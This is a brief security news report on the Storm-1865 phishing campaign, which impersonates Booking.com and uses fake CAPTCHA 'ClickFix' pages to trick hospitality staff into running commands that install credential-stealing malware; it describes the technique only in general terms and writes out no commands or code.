Fake Booking.com emails used in ClickFix phishing campaign attacking hospitality sector

Researchers have exposed an ongoing phishing campaign targeting the hospitality sector by impersonating Booking.com and using a social engineering technique called ClickFix to deliver credential-stealing malware.

The campaign, tracked as Storm-1865 and active since December 2024, aims to commit financial fraud and theft while targeting hospitality professionals across North America, Oceania, Europe and Asia. Attackers send deceptive emails claiming to be from Booking.com, often mentioning negative guest reviews and including links or PDF attachments that seem to direct recipients to the legitimate booking site. However, these links actually lead to counterfeit CAPTCHA verification pages designed to mimic Booking.com. They trick users into executing a command via a keyboard shortcut that opens a Windows Run window.

This command leverages the legitimate mshta.exe binary to drop a payload comprising various malware families such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT. Previous iterations of Storm-1865 have also targeted e-commerce buyers. Security experts note that the rapid adoption of the ClickFix technique marks an evolution in social engineering, as it exploits user trust to bypass automated defenses and is now even being embraced by nation-state groups.